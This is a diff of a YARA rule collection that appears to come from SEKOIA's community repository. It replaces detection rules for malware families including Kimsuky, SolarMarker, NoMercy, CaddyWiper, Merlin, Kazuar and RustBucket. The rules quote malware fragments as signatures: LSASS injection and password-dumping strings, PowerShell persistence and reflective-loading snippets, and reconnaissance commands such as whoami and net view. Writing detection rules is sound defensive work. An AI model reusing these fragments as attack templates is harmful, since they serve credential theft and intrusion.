 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "7099156decdfe35cde22958133d851479f12180fff7b5744af0c549ab8259636"
+		logic_hash = "5e76f7c40a00182ee076720b4c19a45e82a8ce11740fdd8e9419f9d9e93cdb41"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241782,130 +241499,98 @@ rule SEKOIA_Kimsuky_Konni_Dll : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ext_1 = ".zip" wide ascii fullword
-		$ext_2 = ".cab" wide ascii fullword
-		$ext_3 = ".rar" wide ascii fullword
-		$ext_4 = ".ini" wide ascii fullword
-		$ext_5 = ".dat" wide ascii fullword
-		$offset_structure_1 = { 8d ?? 08 02 00 00 }
-		$offset_structure_2 = { 8d ?? 10 04 00 00 }
-		$offset_structure_3 = { 8d ?? 18 06 00 00 }
-		$offset_structure_4 = { 8d ?? 20 08 00 00 }
-		$offset_structure_5 = { 8d ?? 28 0a 00 00 }
-		$offset_structure_6 = { 89 ?? f8 11 00 00 }
-		$offset_structure_7 = { 8d ?? fc 11 00 00 }
-		$offset_structure_8 = { 89 ?? 0c 12 00 00 }
-		$offset_structure_9 = { 89 ?? 10 12 00 00 }
+		$ = "Passlib test utility - Version %s" wide
+		$ = "-l <full_path_to_dll_to_load_into_lsass> (arbitrary dll injection into LSASS)" wide
+		$ = "-u <dll_to_unload_from_lsass> (arbitrary dll uninjection from LSASS)" wide
+		$ = "DLL %s injection was successful requested!" wide
+		$ = "DLL %s uninjection was successful requested!" wide
+		$ = "Process %s was succesfully created with full privileges and system integrity!" wide
+		$ = "full_path_to_volatile_payload_dll" wide
+		$ = "%s: [%s]:[%s] (http_only:%d)" wide
+		$ = "LEX server has been deployed at lsass." wide
+		$ = "LEX client is using volatile payload at: %s" wide
+		$ = "LEX client is using permanent payload at: %s" wide
+		$ = "Passlib execution finished" wide
+		$ = "Running on Passlib version %ws" wide
+		$ = "There was a problem initializing passlib manager interface." wide
+		$ = "Passlib running without high integrity" wide
+		$ = "About to dump passwords through passlib manager interface" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 11MB and all of them
+		uint16( 0 ) == 0x5A4D and filesize > 1500KB and all of them
 }
-rule SEKOIA_Infostealer_Win_Solarmarker_Powershell : FILE
+
+rule SEKOIA_Wiper_Win_Caddywiper : FILE
 {
 	meta:
-		description = "Finds SolarMarker PowerShell script based on characteristic strings"
+		description = "Detect CaddyWiper"
 		author = "Sekoia.io"
-		id = "a2fe7f09-7134-4054-ba40-5ea66785a26d"
-		date = "2022-12-09"
+		id = "869d44ff-79fc-403d-a45d-d33712da5bd0"
+		date = "2022-03-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_solarmarker_powershell.yar#L1-L25"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/wiper_win_caddywiper.yar#L4-L37"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "32267cf7e03ed65da969aeeff5ef5d7291e47446ea11a4b391f085967e8aa67d"
+		logic_hash = "01a9910b42f402398bbe84546074256f56b10fe0f8524a9a9723aebe43b26a14"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1_upx = "b66b179eac03afafdc69f62c207819eceecfbf994c9efa464fda0d2ba44fe2d7"
+		hash1 = "ea6a416b320f32261da8dafcf2faf088924f99a3a84f7b43b964637ea87aef72"
+		hash2 = "a294620543334a721a2ae8eaaf9680a0786f4b9a216d75b55cfd28f39e9430ea"
 
 	strings:
-		$fun = "function " ascii
-		$ps0 = "return -join (0..(10..30|Get-Random)|%{[char]((65..90)+(97..122)|Get-Random)})" ascii
-		$ps1 = /new-item -path \$[a-zA-Z0-9_]* -itemtype registrykey -force;/
-		$ps2 = /set-item -path \$[a-zA-Z0-9_]* -value \$[a-zA-Z0-9_]*;/
-		$str0 = "[IO.File]::WriteAllText($" ascii
-		$str1 = "CreateShortcut($env:appdata+" ascii
-		$str2 = "Registry::HKEY_CURRENT_USER\\Software\\Classes\\" ascii
-		$str3 = "New-Object System.Security.Cryptography.AesCryptoServiceProvider" ascii
-		$str4 = "[Convert]::FromBase64String([IO.File]::ReadAllText(" ascii
+		$ = "NETAPI32.dll" ascii
+		$ = "DsRoleGetPrimaryDomainInformation" ascii
 
 	condition:
-		$fun at 0 and 1 of ( $ps* ) and 2 of ( $str* )
+		uint16( 0 ) == 0x5A4D and filesize > 5KB and filesize < 20KB and pe.number_of_sections == 3 and pe.number_of_resources == 0 and all of them or pe.imphash ( ) == "ea8609d4dad999f73ec4b6f8e7b28e55" or pe.imphash ( ) == "bae2d138abe43164fb5e95f313de3d14" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f0d4c11521fc3891965534e6c52e128b" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "6be6e878d1e8fed277c5feaf60b57a19" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "11f22fc72c3ca7dd6b874bda37c1fe82" )
 }
-rule SEKOIA_Nomercy : FILE
+
+rule SEKOIA_Merlin_Win_Dll : FILE
 {
 	meta:
-		description = "Detect NoMercy sample version up to 1.1.0"
+		description = "Detects Merling agent (DLL)"
 		author = "Sekoia.io"
-		id = "2591f74b-8ab8-45ef-ba64-62a93df305c1"
-		date = "2022-07-11"
+		id = "c9c57f5e-26c3-43be-b2cf-10f5129d3be5"
+		date = "2022-01-03"
 		modified = "2024-12-19"
-		reference = "https://blog.cyble.com/2022/07/07/nomercy-stealer-adding-new-features/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/nomercy.yar#L1-L61"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/merlin_win_dll.yar#L4-L42"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "175bc58f1b34bb60f6cacc15747e944cbbdd58fe287ff46abed969eaa39870db"
+		logic_hash = "eefaed10bd3accc884673437a1cc6b8c503db4ef797e58bd95daec36a297c4be"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
-		hash1 = "9ecc76d4cda47a93681ddbb67b642c2e1f303ab834160ab94b79b47381e23a65"
-		hash2 = "557acce8b787aba87c8eeb939438b52c5ca953f28ad680a7faeb2b3046d3fda0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$debug1 = "Posted uid and version" wide ascii
-		$debug2 = "Posted cli info to server" wide ascii
-		$debug3 = "Posted other info to server" wide ascii
-		$debug4 = "Sending screenshot..." wide ascii
-		$debug5 = "Sent screenshot" wide ascii
-		$debug6 = "Listening to Microphone..." wide ascii
-		$debug7 = "Collecting other info..." wide ascii
-		$url1 = "/a?uid=" wide ascii
-		$url2 = "/c?uid=" wide ascii
-		$url3 = "/d?uid=" wide ascii
-		$url4 = "/e?uid=" wide ascii
-		$url5 = "/b?sysinfoother=" wide ascii
-		$url6 = "/b?sysinfocli=" wide ascii
-		$info1 = "PUBLIC IP:" wide ascii
-		$info2 = "HWID:" wide ascii
-		$info3 = "RAM:" wide ascii
-		$info4 = "GPU:" wide ascii
-		$info5 = "MEDIA ACCESS CONTROL ADDRESS:" wide ascii
-		$info6 = "PRIVATE IP:" wide ascii
-		$info7 = "OS VERSION:" wide ascii
-		$info8 = "ANTIVIRUS:" wide ascii
-		$info9 = "KEYBOARD LANGUAGE:" wide ascii
-		$info10 = "CLIPBOARD: {0}{1}{2}" wide ascii
-		$info11 = "RUNNING PROCESSES:" wide ascii
-		$info12 = "WINDOW TITLE:" wide ascii
-		$cmd1 = "/c whoami /all" wide ascii
-		$cmd2 = "/c whoami" wide ascii
-		$cmd3 = "/c arp -a" wide ascii
-		$cmd4 = "/c ipconfig /all" wide ascii
-		$cmd5 = "/c net view /all" wide ascii
-		$cmd6 = "/c net share" wide ascii
-		$cmd7 = "/c route print" wide ascii
-		$cmd8 = "/c netstat -nao" wide ascii
-		$cmd9 = "/c net localgroup" wide ascii
-		$cmd10 = "/c systeminfo" wide ascii
-		$inv1 = "http://api.ipify.org" wide ascii
-		$inv2 = "NoMercy" wide ascii
+		$s1 = ".CRT" ascii
+		$s2 = ".tls" ascii
+		$s3 = "github.com/Ne0nd0g/merlin" ascii
+		$s4 = "github.com/lucas-clemente" ascii
+		$s5 = "SendMerlinMessage" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of ( $debug* ) and 8 of ( $info* ) and 2 of ( $url* ) and 6 of ( $cmd* ) and 1 of ( $inv* ) and filesize > 700KB and filesize < 3000KB
+		uint16( 0 ) == 0x5A4D and pe.imphash ( ) == "da7f8acb6151c95be088a02465d68ef8" and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "491d9a18aea3d0eb3653fdaf0b9b86bb" ) and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "d41d8cd98f00b204e9800998ecf8427e" ) and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "bf619eac0cdf3f68d496ea9344137e8b" ) and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ce7969c1e894363133e386361be064e5" ) and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "c6179cdcd9ba0758a18a1280f98062eb" ) and all of them and $s1 at 712 and $s2 at 752 and filesize < 15MB
 }
-rule SEKOIA_Apt_Kimsuky_Validator_Strings : FILE
+rule SEKOIA_Apt_Aptk47_Asyncshell : FILE
 {
 	meta:
-		description = "Detects Kimsuky validator"
+		description = "Detects APT-K-47's Asyncshell"
 		author = "Sekoia.io"
-		id = "e055f2d4-8318-4342-812e-0f621d7886b4"
-		date = "2024-06-11"
+		id = "2d009cf4-e30e-406d-8860-03b37a396ffa"
+		date = "2024-11-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_validator_strings.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_aptk47_asyncshell.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a627dae8c12f0f6f8472bc12b8e1a85137f92f6e389f817ab9023c90720a42b0"
+		hash = "ce6a589d5e3604112e5595a1f8d53e1e"
+		hash = "751f427da8e11d8ab394574260735220"
+		logic_hash = "ac202f7dc317d17118badf71c32776c5666eea4a47e1b439a287b6b8766e9da6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241913,56 +241598,54 @@ rule SEKOIA_Apt_Kimsuky_Validator_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "%s%sc %s >%s 2>&1" wide
-		$ = "%s%sc %s 2>%s" wide
+		$ = "Error executing command:" wide
+		$ = "Error occurred:" wide
+		$ = "Attempting to reconnect in {0} seconds..." wide
+		$ = "Exiting the application." wide
+		$ = "Server disconnected." wide
+		$ = "_CorExeMain"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
 }
-rule SEKOIA_Platypus_Winlinmac_Strings : FILE
+rule SEKOIA_Zip_Win_Abcloader
 {
 	meta:
-		description = "Catch Platypus based on strings"
+		description = "Use the CRC32 to detect a zip containing the doc file used to drop and launch ABCloader"
 		author = "Sekoia.io"
-		id = "4519448d-b91b-4794-9521-359b8cf4af78"
-		date = "2023-12-07"
+		id = "0d14b34a-9095-48fa-b616-4e8239f3b547"
+		date = "2024-08-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/platypus_winlinmac_strings.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/zip_win_abcloader.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "3c8e928fb8328381997230d4b60de20d07a9a3aee006aad9fc0b67fcfe61a63b"
+		hash = "0c7d8e611781b29e15df415640858294"
+		logic_hash = "024d068a86432f35b0f7af0c4cdccb37d0979d01e90f7c9d1ae8a2dddfa3bfc8"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$pl1 = "platypus.go" ascii
-		$pl2 = "Platypus/lib/context/server.go" ascii
-		$pl3 = "Platypus/lib/context/context.go" ascii
-		$pl4 = "Platypus/lib/context/client.go" ascii
-		$pl5 = "github.com/WangYihang/" ascii
-		$f1 = "reflection/reflection.go" ascii
-		$f2 = "socksUsernamePassword" ascii
-		$go = "/golang" ascii
+		$crc = {32 56 27 e2}
+		$name = "iden.doc"
 
 	condition:
-		uint32( 0 ) == 0x464c457f and 4 of ( $pl* ) and 1 of ( $f* ) and #go > 30
+		$name at @crc [ 1 ] + 16
 }
-rule SEKOIA_Apt_Evasive_Panda_Rphost_Dll : FILE
+rule SEKOIA_Apt_Turla_Kazuar_Variant_2023 : FILE
 {
 	meta:
-		description = "Detects DLL used by Evasive Panda"
+		description = "New variant of Kazuar observed in 2023"
 		author = "Sekoia.io"
-		id = "8d70639d-b736-4823-86ad-37f0e383b5f7"
-		date = "2024-03-15"
+		id = "51e9de6a-5d8a-4627-8063-b70f78e78726"
+		date = "2023-11-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_evasive_panda_rphost_dll.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_turla_kazuar_variant_2023.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "fa44028115912c95b5efb43218f3c7237d5c349f"
-		logic_hash = "2132f1c69db8fd5793c858ada2443fdfa1f941e68d24cc337766df99f8b3a895"
+		logic_hash = "98207fef906c922ff09f72b0dea7103c0fb86c5ec4712a23ecba6840b79b0ad5"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241970,24 +241653,26 @@ rule SEKOIA_Apt_Evasive_Panda_Rphost_Dll : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "htks.ini" ascii fullword
-		$s2 = "MyDemo" wide fullword
+		$s1 = "Started from file '" ascii wide
+		$s2 = "Zombifying user's" ascii wide
+		$s3 = "Result #{0:X16} already exists in {1}" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them and filesize < 1MB
+		uint16( 0 ) == 0x5a4d and 2 of them
 }
-rule SEKOIA_Koi_Netstealer : FILE
+rule SEKOIA_Implant_Mac_Rustbucket : FILE
 {
 	meta:
-		description = "Detects NET ofbuscated Stealer used loaded by KoiLoader"
+		description = "Detect the RustBucket malware"
 		author = "Sekoia.io"
-		id = "deb06e2a-848c-44b3-be95-017ebccf11f8"
-		date = "2024-03-20"
+		id = "fcbb745d-7f56-4c51-9db5-427da22a0c68"
+		date = "2023-04-24"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/koi_netstealer.yar#L1-L20"
+		reference = "https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_mac_rustbucket.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "814db1092820ff1ed9e592dc92c72ad73643eb6d68df9f593ed637434373e41b"
+		hash = "9ca914b1cfa8c0ba021b9e00bda71f36cad132f27cf16bda6d937badee66c747"
+		logic_hash = "ab7bc706b0d3f0dcd739ffe7f8153ba7377892143d8d53ce1591519ffe4ae84f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241995,55 +241680,48 @@ rule SEKOIA_Koi_Netstealer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$name_1 = "pg20"
-		$name_2 = "pg40"
-		$s1 = "Curve25519"
-		$s2 = "ConsoleApp"
-		$s3 = "e0d2eec7-eb14-48ba-8709-dcc9de65947d"
+		$ = "/Users/hero/"
+		$ = "PATHIpv6Ipv4Bodyslotpath"
+		$macho_magic = {CF FA ED FE}
+		$java_magic = {CA FE BA BE}
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 150KB and any of ( $name_* ) and all of ( $s* )
+		($macho_magic at 0 or $java_magic at 0 ) and all of them
 }
-rule SEKOIA_Koiloader_Powershell_Reflective_Loading : FILE
+
+rule SEKOIA_Ransomware_Win_Eking_Rich_Header
 {
 	meta:
-		description = "Powershell script loading service.exe (related to Koi Loader)"
+		description = "Detect Eking ransomware using its rich header"
 		author = "Sekoia.io"
-		id = "9bbe4cea-3e64-4377-bf93-def9fb629734"
-		date = "2024-03-20"
+		id = "9fe76f89-f27a-4a47-a61c-2d767a1a8acb"
+		date = "2021-10-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/koiloader_powershell_reflective_loading.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_eking_rich_header.yar#L4-L15"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "27deec01027a73129c6c8057eff1b48190c89ac18dcd7c390fc177d82a897290"
+		logic_hash = "0028200fc2e929dba6fcc4ddf5d8e07825842e2f65c69ad94ebd032ae3748c90"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$s1 = "[Byte[]]$image" ascii fullword
-		$s2 = "function GDT"
-		$s3 = "function GPA"
-		$s4 = "GDT @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])"
-		$s5 = "$marshal::GetDelegateForFunctionPointer($CTAddr, $CTDeleg)"
-
 	condition:
-		$s1 at 0 and 4 of them
+		hash.md5( pe.rich_signature.clear_data ) == "256b60751602028612562b73ecdb163c"
 }
-rule SEKOIA_Apt_3Cx_Payload_Stealer : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_2 : FILE
 {
 	meta:
-		description = "Detects stealer used in 3CX campaign"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "1ca0605d-101f-4d1d-a476-9dfd93e74b4c"
-		date = "2023-03-31"
+		id = "02bc795f-b8e0-44d4-b475-310359867577"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_3cx_payload_stealer.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_2.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "17630ab86a3da3408e29765c0c30f14c76b870b88fea634b998392fe5d46cfa2"
+		logic_hash = "c26779cd35d6430da3629df8b310356d663c05e82db0aca0fc974bc3a298c92e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242051,28 +241729,25 @@ rule SEKOIA_Apt_3Cx_Payload_Stealer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "******************************** %s ******************************" wide
-		$s2 = "\\3CXDesktopApp\\config.json" wide
-		$s3 = "{\"HostName\": \"%s\", \"DomainName\": \"%s\", \"OsVersion\":" wide
-		$s4 = "%s.old" wide
+		$ = "var e={},i,b=0,c,x,l=0,a,r="
+		$ = "eval(plain);"
+		$ = "var plain = rc4("
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and all of them
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Tinyfluff_Nodejs : FILE
+rule SEKOIA_Apt_Scanbox_Obfuscated_Versions : FILE
 {
 	meta:
-		description = "Detect TinyFluff backdoor by OldGremlin"
+		description = "Detects obfuscated versions of the scanbox framework"
 		author = "Sekoia.io"
-		id = "ca8cbd90-f275-4442-8354-b8b069e2efc3"
-		date = "2022-04-20"
+		id = "2866cead-7f16-4895-80ef-aad6fb66e864"
+		date = "2022-09-01"
 		modified = "2024-12-19"
-		reference = "https://blog.group-ib.com/oldgremlin_comeback"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tinyfluff_nodejs.yar#L1-L21"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_scanbox_obfuscated_versions.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "bd0a6a3628f268a37ac9d708d03f57feef5ed55e"
-		hash = "bd0a6a3628f268a37ac9d708d03f57feef5ed55e"
-		logic_hash = "7fa07b6ea32b914887bdcada0f9fda086bc29a44bfdf27e7433ef589192f4b82"
+		logic_hash = "0395d1ac9a593aa8249f6d16c485e431349cecf2f379d2b5bac466541f71968c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -242080,74 +241755,158 @@ rule SEKOIA_Tinyfluff_Nodejs : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "TinyFluff.pdb" fullword ascii
-		$s2 = "node.exe" fullword wide
+		$ = "$_$_$_$__$_____$__$_$_$_$__$"
+		$ = "NztCm_NcDkh"
+		$ = "____$_$__$__$_______w____$_$__$__$_____i____$_$__$__$_____"
+		$ = "391,379,398,381,386"
+		$ = "plguinurl"
+		$ = "plugin_timeout*1000"
 
 	condition:
-		filesize < 500KB and uint16be( 0 ) == 0x4d5a and all of them
+		2 of them and filesize < 500KB
 }
-rule SEKOIA_Apt_Mustang_Panda_Nupakage : FILE
+rule SEKOIA_Apt_Lazarus_Lambload_Timecheck : FILE
 {
 	meta:
-		description = "Detects NUPAKAGE malware (only PDB, too much false positives)"
+		description = "Detects timeCheck routine in LambLoad"
 		author = "Sekoia.io"
-		id = "bd62c220-addc-48e9-bd01-2eff687ac3ce"
-		date = "2023-03-24"
+		id = "8807c752-c34e-4c3b-9194-3a9bd2575a88"
+		date = "2023-11-27"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustang_panda_nupakage.yar#L1-L16"
+		reference = "https://www.microsoft.com/en-us/security/blog/2023/11/22/diamond-sleet-supply-chain-compromise-distributes-a-modified-cyberlink-installer/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_lazarus_lambload_timecheck.yar#L1-L67"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "255c77af714b1b66275f3973fb112994ccb028d5d60562bbde30df5a761f03d3"
-		score = 50
-		quality = 78
+		logic_hash = "019e559f3596cf83f7e7ada05f6550b50b2d45d577600fa549470b98af93e23b"
+		score = 75
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "D:\\Project\\NEW_PACKAGE_FILE\\Release\\NEW_PACKAGE_FILE.pdb" ascii wide
+		$chunk_1 = {
+        0F 85 ?? ?? ?? ??
+        8D 85 ?? ?? ?? ??
+        50
+        E8 ?? ?? ?? ??
+        83 C4 ??
+        83 78 ?? ??
+        0F 85 ?? ?? ?? ??
+        8B 48 ??
+        83 F9 ??
+        0F 8C ?? ?? ?? ??
+        83 F9 ??
+        0F 8D ?? ?? ?? ??
+        8B 40 ??
+        83 F8 ??
+        0F 8C ?? ?? ?? ??
+        83 F8 ??
+        0F 8D ?? ?? ?? ??
+        53
+        57
+        68 ?? ?? ?? ??
+        8D 85 ?? ?? ?? ??
+        6A ??
+        50
+        C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+        }
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
+		uint16be( 0 ) == 0x4d5a and any of them
 }
-rule SEKOIA_Tool_Safetykatz : FILE
+
+rule SEKOIA_Implant_Win_Knotweed_Jumplump : FILE
 {
 	meta:
 		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "90f93244-38a7-4574-87c6-15d494e9173b"
-		date = "2023-06-23"
+		id = "8f8cec7a-624b-4306-87f4-bde8ccc3a2d0"
+		date = "2022-07-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_safetykatz.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_knotweed_jumplump.yar#L3-L75"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f443dd5be1e15f8385427d965f8c8476c5f1b57b7c9ab53d9e13eb47735e09d3"
+		logic_hash = "a2637a8a082b6a23756da188808405046ae986a5973f64859462c92e9306e6c8"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "SafetyKatz" ascii fullword
-		$s2 = "get_mimikatz" ascii fullword
-		$s3 = "$8347e81b-89fc-42a9-b22c-f59a6a572dec" ascii fullword
+		$s1 = "DllCanUnloadNow"
+		$s2 = "DllGetClassObject"
+		$s3 = "_initterm"
+		$s4 = "__C_specific_handler"
+		$s5 = "HeapFree"
+		$s6 = "EnterCriticalSection"
+		$s7 = "EventUnregister"
+		$s8 = "LeaveCriticalSection"
+		$s9 = "WaitForSingleObject"
+		$s10 = "GetCurrentThreadId"
+		$s11 = "GetLastError"
+		$s12 = "CloseHandle"
+		$s13 = "HeapAlloc"
+		$s14 = "EventRegister"
+		$s15 = "GetProcAddress"
+		$s16 = "DeleteCriticalSection"
+		$s17 = "GetCurrentProcessId"
+		$s18 = "GetProcessHeap"
+		$s19 = "DisableThreadLibraryCalls"
+		$s20 = "Sleep"
+		$s21 = "RtlCaptureContext"
+		$s22 = "RtlLookupFunctionEntry"
+		$s23 = "RtlVirtualUnwind"
+		$s24 = "UnhandledExceptionFilter"
+		$s25 = "SetUnhandledExceptionFilter"
+		$s26 = "GetCurrentProcess"
+		$s27 = "TerminateProcess"
+		$s28 = "QueryPerformanceCounter"
+		$s29 = "GetSystemTimeAsFileTime"
+		$s30 = "GetTickCount"
+		$s31 = "CoCreateInstance"
+		$s32 = "RegCloseKey"
+		$s33 = "GetModuleFileNameW"
+		$s34 = "RegCreateKeyExW"
+		$s35 = "RegSetValueExW"
+		$s36 = "LocalFree"
+		$s37 = "RegOpenKeyExW"
+		$s38 = "OLEAUT32.dll"
+		$s39 = "memcpy"
+		$s40 = "memcmp"
+		$s41 = "memset"
+		$s42 = "LoadLibraryW"
+		$s43 = "OpenProcessToken"
+		$s44 = "DllRegisterServer"
+		$s45 = "DllUnregisterServer"
+		$s46 = "040904B0" wide
+		$api_hash1 = {5D 44 11 FF}
+		$api_hash2 = {4C 77 D6 07}
